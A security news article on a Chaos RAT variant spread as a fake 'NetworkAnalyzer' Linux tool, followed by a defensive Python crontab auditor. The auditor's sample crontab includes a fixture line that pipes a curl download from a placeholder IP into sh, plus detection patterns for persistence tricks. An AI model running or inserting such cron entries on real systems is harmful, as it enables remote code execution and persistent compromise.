Stratos Ally

New Chaos Variant Targets Both Linux and Windows in Stealthy Phishing Wave


StratosAlly


Cybersecurity experts have identified a fresh strain of Chaos RAT, a remote access trojan written in Go, that is now going after both Windows and Linux machines.

According to findings from Acronis, the attackers are tricking users by packaging the malware as a seemingly harmless Linux network tool, with filenames like “NetworkAnalyzer.tar.gz” to make it look legit. 

Chaos RAT mimics the functionality of tools like Cobalt Strike and Sliver, providing an administrative panel to craft payloads and manage infected systems. After deployment, it connects to a remote server and enables operations such as reverse shell access, file manipulation, and system monitoring.

Chaos RAT has shown up in several cryptocurrency mining attacks recently. In most cases, attackers trick people with phishing emails that deliver malicious scripts which modify /etc/crontab, ensuring persistent access to infected Linux machines.
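Because the persistence mechanism described here is a crontab edit, a defender's first check on a suspect Linux host is simply to audit /etc/crontab for entries that look out of place. The script below is an added example, not code from the article, from Acronis, or from Chaos RAT itself: it parses crontab text and flags entries that carry common persistence indicators (download piped to a shell, base64 decoding, binaries run from /tmp or hidden directories, @reboot or every-minute schedules). The indicator list and the sample crontab, including the 198.51.100.23 address, are constructed for illustration; the "NetworkAnalyzer" filename comes from the article.

```python
"""Crontab persistence auditor (added example, not from the article).

The indicator patterns are a starting point for triage, not a complete
signature set; the sample crontab below is constructed and the IP address
in it is from the 198.51.100.0/24 documentation range.
"""
import re
import sys
from dataclasses import dataclass, field

# Constructed sample of an /etc/crontab: two stock Debian entries followed
# by two that resemble cron-based persistence.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root curl -fsSL http://198.51.100.23/update.sh | sh
@reboot root /tmp/.cache/NetworkAnalyzer >/dev/null 2>&1
"""

# (name, regex) pairs; an entry is reported with every name that matches.
SUSPICIOUS = [
    ("pipe_to_shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")),
    ("base64_decode", re.compile(r"base64\s+(-d|--decode)\b")),
    ("temp_path",     re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/")),
    ("every_minute",  re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")),
    ("reboot",        re.compile(r"^@reboot\b")),
    ("hidden_dir",    re.compile(r"/\.[^/\s]+/")),
]


@dataclass
class Finding:
    line_no: int
    reasons: list = field(default_factory=list)
    entry: str = ""


def parse_entries(text):
    """Yield (line_no, entry) for schedule lines only.

    Blank lines, comments and VAR=value assignments (SHELL=, PATH=, MAILTO=)
    are skipped so they cannot produce false positives.
    """
    for n, line in enumerate(text.splitlines(), start=1):
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
            continue
        yield n, s


def audit_crontab(text):
    """Return a list of Finding objects for entries matching any indicator."""
    findings = []
    for n, entry in parse_entries(text):
        reasons = [name for name, rx in SUSPICIOUS if rx.search(entry)]
        if reasons:
            findings.append(Finding(line_no=n, reasons=reasons, entry=entry))
    return findings


def audit_file(path):
    """Audit a crontab file on disk (e.g. /etc/crontab or a file under /etc/cron.d)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_crontab(fh.read())


if __name__ == "__main__":
    # With no argument, run against the constructed sample.
    results = audit_file(sys.argv[1]) if len(sys.argv) > 1 else audit_crontab(SAMPLE_CRONTAB)
    for f in results:
        print(f"line {f.line_no}: {', '.join(f.reasons)}\n    {f.entry}")
```

Run it against a real host with `python3 crontab_audit.py /etc/crontab`, and repeat for each file in /etc/cron.d and the per-user spool (/var/spool/cron/crontabs on Debian-based systems), since a script that can write /etc/crontab can just as easily drop a file next to it. A match is a triage lead, not a verdict: legitimate tooling sometimes uses @reboot or runs from /var/tmp, so compare any hit against the package that owns the referenced binary and the file's modification time.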

The newest version of Chaos RAT (5.0.3) was released in May 2024. Before that, it was often used alongside cryptocurrency miners, primarily for reconnaissance and lateral movement within compromised systems. 

Security researchers have also uncovered two critical vulnerabilities in Chaos RAT’s administrative panel:

CVE-2024-30850 (CVSS 8.8): a command injection flaw. 

CVE-2024-31839 (CVSS 4.8): a cross-site scripting (XSS) vulnerability.

No one is sure yet who is behind the Chaos RAT campaign, but it clearly shows how threat actors are taking advantage of open-source tools. Since these tools are freely available, it is getting harder to tell whether a hacker group is just a criminal gang or something more organized, like a nation-state actor.

On a different note, researchers also spotted another campaign targeting Trust Wallet desktop users. This one distributes fake applications via phishing emails and deceptive download links to trick people into installing malware. Once it is on the system, the malware grabs wallet credentials and private keys and even supports remote command execution, posing a serious threat to users of desktop-based cryptocurrency wallets.
